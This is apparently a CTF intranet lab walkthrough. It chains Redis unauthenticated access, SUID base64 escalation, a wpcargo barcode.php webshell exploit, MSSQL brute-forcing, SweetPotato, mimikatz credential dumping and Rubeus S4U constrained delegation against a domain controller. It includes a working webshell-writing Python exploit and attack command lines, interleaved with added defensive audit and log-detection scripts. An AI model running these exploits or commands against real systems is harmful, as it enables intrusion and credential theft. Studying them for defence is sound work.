Ran fscan over the target and found a Redis instance with unauthenticated access.
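The finding above is a configuration problem on the Redis side. As an added example (not part of the original post, and not the script the author used), the following Python audits a `redis.conf` for the settings that leave an instance open: no `requirepass`, a `bind` on all interfaces, `protected-mode no`, and an unrenamed `CONFIG` command. The sample configuration is constructed.

```python
from typing import Dict, List

# Constructed redis.conf fragment (not from the original post): the combination of
# settings that lets any client on the network run commands without a password.
SAMPLE_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is commented out, so no authentication is required
# requirepass change-me
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass use-a-long-random-secret
rename-command CONFIG ""
"""


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Parse redis.conf into {directive: [values...]}; comments and blank lines are skipped.

    Values are kept as raw strings; a directive that appears several times keeps
    every occurrence, and the last one wins when Redis reads the file.
    """
    conf: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1] if len(parts) > 1 else ''
        conf.setdefault(key, []).append(value)
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """Return findings that explain why this config allows unauthenticated use."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    # 1. No password: every client that can reach the port is fully trusted.
    if 'requirepass' not in conf or not conf['requirepass'][-1].strip():
        findings.append('no requirepass: clients connect without authentication')

    # 2. Listener reachable from other hosts. Without a bind directive Redis listens
    #    on every interface (protected-mode is the only remaining guard).
    binds = conf.get('bind', [])
    exposed = any(addr in ('0.0.0.0', '*', '::') for b in binds for addr in b.split())
    if not binds or exposed:
        findings.append('bind exposes the listener beyond localhost')

    # 3. protected-mode refuses non-loopback clients when no password is set.
    if conf.get('protected-mode', ['yes'])[-1].strip().lower() == 'no':
        findings.append('protected-mode disabled')

    # 4. CONFIG is the command unauthenticated-access exploits rely on to change
    #    runtime settings; renaming it to "" removes it entirely.
    renamed = {v.split()[0].lower() for v in conf.get('rename-command', []) if v.split()}
    if 'config' not in renamed:
        findings.append('CONFIG command not renamed/disabled')

    return findings


if __name__ == '__main__':
    for label, text in (('sample', SAMPLE_CONF), ('hardened', HARDENED_CONF)):
        print(label, audit_redis_conf(text) or 'OK')
```

Run it against the real file with `audit_redis_conf(open('/etc/redis/redis.conf').read())`; an empty list means none of the four checks fired. Renaming `CONFIG` is a blunt instrument, so the usage note from the Redis documentation applies: do it on production instances only after confirming nothing legitimate calls `CONFIG` at runtime.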

Used a script to get a shell through the unauthenticated Redis instance.

The shell had no permission to read the flag, but the base64 binary had the SUID bit set, which can be used to escalate privileges.
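The SUID bit on base64 is exactly the kind of thing a periodic host audit should flag before an attacker finds it. As an added example (not from the original post), this Python script walks a directory tree, collects SUID/SGID regular files and sorts them into a risky set (programs that read or write arbitrary files as their owner; base64 here), an expected set and an unexpected remainder for review. Both sets are constructed starting points, not exhaustive lists; compare against a baseline of your own image.

```python
import os
import stat
from typing import Dict, Iterable, List, Tuple

# SUID/SGID programs present by design on most Linux systems (constructed example set).
EXPECTED_SETUID = {'sudo', 'su', 'passwd', 'mount', 'umount', 'ping',
                   'chsh', 'chfn', 'newgrp', 'gpasswd'}
# Programs that must never carry the SUID bit: running them as root reads or writes
# arbitrary files as root. base64 is the one abused in the post above.
RISKY_SETUID = {'base64'}


def collect_setuid_entries(root: str) -> List[Tuple[str, int]]:
    """Walk `root` and return (path, st_mode) for regular files with SUID or SGID set.

    Symlinks are skipped (lstat), and unreadable directories are ignored so the
    scan still completes when run as an unprivileged user.
    """
    found: List[Tuple[str, int]] = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append((path, st.st_mode))
    return found


def classify_setuid(entries: Iterable[Tuple[str, int]]) -> Dict[str, List[str]]:
    """Split (path, st_mode) entries into risky / expected / unexpected buckets.

    Entries that are not setuid/setgid regular files are ignored, so the function
    can be fed raw stat output as well as the output of collect_setuid_entries().
    """
    report: Dict[str, List[str]] = {'risky': [], 'expected': [], 'unexpected': []}
    for path, mode in entries:
        if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
            continue
        name = os.path.basename(path)
        if name in RISKY_SETUID:
            report['risky'].append(path)
        elif name in EXPECTED_SETUID:
            report['expected'].append(path)
        else:
            report['unexpected'].append(path)
    return report


if __name__ == '__main__':
    import sys
    scan_root = sys.argv[1] if len(sys.argv) > 1 else '/usr'
    for bucket, paths in classify_setuid(collect_setuid_entries(scan_root)).items():
        for p in paths:
            print(f'{bucket:10s} {p}')
```

The fix for a risky hit is `chmod u-s /usr/bin/base64` (and finding out how the bit got there); anything in the unexpected bucket is worth a look against the package manager's recorded permissions, for example `dpkg --verify` or `rpm -V`.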

Uploaded fscan and scanned the internal network with it.

Set up frp to tunnel into the internal network.

First, try the host that runs WordPress.

Ran wpscan against it; it found the wpcargo plugin.

Used a script to write a webshell through the plugin's barcode.php:

```python
import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'


def encode_character_code(c: int) -> str:
    # 8-bit binary representation of the byte, with every '0' replaced by 'x'
    return '{:08b}'.format(c).replace('0', 'x')


# Encode every payload byte; the leading bit is dropped so the pixel rows line up.
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
```
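From the defender's side, the request the script above sends is easy to spot in the web server's access log: a hit on `wpcargo/includes/barcode.php` carrying a `filepath` parameter, followed by requests to the file it wrote. As an added example (not from the original post), this Python parser reads combined-format access log lines and raises an alert for both. The log lines are constructed and only modelled on the script's request; the document root is an assumption passed in as a parameter.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = [
    '172.22.2.5 - - [10/May/2023:10:01:02 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=hello&size=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '172.22.2.5 - - [10/May/2023:10:01:05 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=1x1x&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 95 "-" "python-requests/2.28.1"',
    '172.22.2.5 - - [10/May/2023:10:01:06 +0000] "POST /webshell.php?1=system HTTP/1.1" 200 210 "-" "python-requests/2.28.1"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[Dict]:
    """Parse one combined-format line into a dict with path and query already split."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # PHP keeps the last value of a repeated parameter, so do the same here.
    rec['query'] = {k: v[-1] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def detect_barcode_writes(lines: List[str], docroot: str = '/var/www/html') -> List[Dict]:
    """Alert on barcode.php requests with a filepath parameter, then on any later
    request whose URL path maps to the file that was written (docroot is assumed)."""
    alerts: List[Dict] = []
    written_urls = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, query = rec['path'], rec['query']
        if path.endswith('/wpcargo/includes/barcode.php') and 'filepath' in query:
            target = query['filepath']
            alerts.append({'ip': rec['ip'], 'ts': rec['ts'], 'path': path,
                           'reason': 'barcode.php called with filepath (arbitrary file write)',
                           'file': target})
            if target.startswith(docroot):
                written_urls.add(target[len(docroot):] or '/')
        elif path in written_urls:
            alerts.append({'ip': rec['ip'], 'ts': rec['ts'], 'path': path,
                           'reason': 'request to a file previously written via barcode.php',
                           'file': docroot + path})
    return alerts


if __name__ == '__main__':
    for alert in detect_barcode_writes(SAMPLE_LOG):
        print(alert['ts'], alert['ip'], alert['reason'], alert['file'])
```

A plain barcode request (first sample line) produces no alert; the second line is the write and the third is the first use of the dropped file. The mitigation is to update or remove the plugin; until then, blocking the `filepath` parameter on `barcode.php` at the web server or WAF stops this particular write.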

Connected with AntSword (蚁剑), using connection type cmdlinux.

The database credentials are in wp-config.php. Connecting to the database gave the second flag and a hint containing some passwords, which I saved as a wordlist.

Then used that wordlist to brute-force the password of the MSSQL server found earlier, and found the correct one.

Connected with MDUT and uploaded SweetPotato to escalate privileges.

Added a user and put it in the administrators group.

Connected over Remote Desktop and found flag3.

Next comes the constrained delegation attack.

Uploaded mimikatz to obtain the user hashes:

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
```

Obtained a TGT with Rubeus.

Used this TGT to request a TGS for the domain controller's CIFS service via S4U and inject it into memory:

```
..exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:xxx
```

Read the flag on the domain controller.
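The step above works because an account in the domain is allowed to delegate to `CIFS/DC.xiaorang.lab` with protocol transition enabled, and `Administrator` is not protected from delegation. As an added example (not from the original post), this Python audit takes records shaped like an LDAP search result over `msDS-AllowedToDelegateTo` and `userAccountControl` and reports the three conditions a defender would want to remove: protocol transition (`TRUSTED_TO_AUTH_FOR_DELEGATION`), a delegation target on a domain controller, and a privileged account lacking the "sensitive and cannot be delegated" flag. The sample records and account names are constructed; only `DC.xiaorang.lab`, `CIFS` and `Administrator` come from the post.

```python
from typing import Dict, List, Sequence, Tuple

# userAccountControl bit values as documented by Microsoft.
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # "Use any authentication protocol" (protocol transition)
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000

REASON_PROTOCOL_TRANSITION = ('constrained delegation with protocol transition: '
                              'can obtain service tickets for any non-protected user via S4U2Self')
REASON_TARGETS_DC = 'delegation target is a service on a domain controller'
REASON_NOT_SENSITIVE = 'privileged account not marked "sensitive and cannot be delegated"'

# Constructed records in the shape an LDAP query returns (names are assumptions).
SAMPLE_ACCOUNTS: List[Dict] = [
    {'sAMAccountName': 'WEB01$',
     'userAccountControl': WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     'msDS-AllowedToDelegateTo': ['CIFS/DC.xiaorang.lab', 'CIFS/DC']},
    {'sAMAccountName': 'Administrator',
     'userAccountControl': NORMAL_ACCOUNT,
     'msDS-AllowedToDelegateTo': []},
    {'sAMAccountName': 'svc-backup',
     'userAccountControl': NORMAL_ACCOUNT,
     'msDS-AllowedToDelegateTo': ['HTTP/files.xiaorang.lab']},
]


def spn_host(spn: str) -> str:
    """Return the lower-cased host part of 'service/host[:port][/name]'."""
    return spn.split('/', 1)[-1].split('/', 1)[0].split(':', 1)[0].lower()


def audit_delegation(accounts: Sequence[Dict],
                     dc_hosts: Sequence[str] = ('DC.xiaorang.lab',),
                     protected: Sequence[str] = ('Administrator',)) -> List[Tuple[str, str]]:
    """Return (sAMAccountName, reason) pairs for delegation settings worth removing.

    dc_hosts: host names of domain controllers (any delegation target there is critical).
    protected: accounts that must carry NOT_DELEGATED so S4U2Proxy cannot impersonate them.
    """
    findings: List[Tuple[str, str]] = []
    dc_set = {h.lower() for h in dc_hosts}
    for acct in accounts:
        name = acct['sAMAccountName']
        uac = int(acct.get('userAccountControl', 0))
        targets = acct.get('msDS-AllowedToDelegateTo') or []
        if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append((name, REASON_PROTOCOL_TRANSITION))
        if any(spn_host(spn) in dc_set for spn in targets):
            findings.append((name, REASON_TARGETS_DC))
        if name in protected and not uac & NOT_DELEGATED:
            findings.append((name, REASON_NOT_SENSITIVE))
    return findings


if __name__ == '__main__':
    for account, reason in audit_delegation(SAMPLE_ACCOUNTS):
        print(f'{account:16s} {reason}')
```

In a real domain the records come from an LDAP search with filter `(msDS-AllowedToDelegateTo=*)` plus a separate lookup of the privileged accounts; the remediation for the findings is to clear the delegation list on the computer account, disable "Use any authentication protocol", and put `Administrator` and similar accounts in the Protected Users group or set the sensitive flag on them.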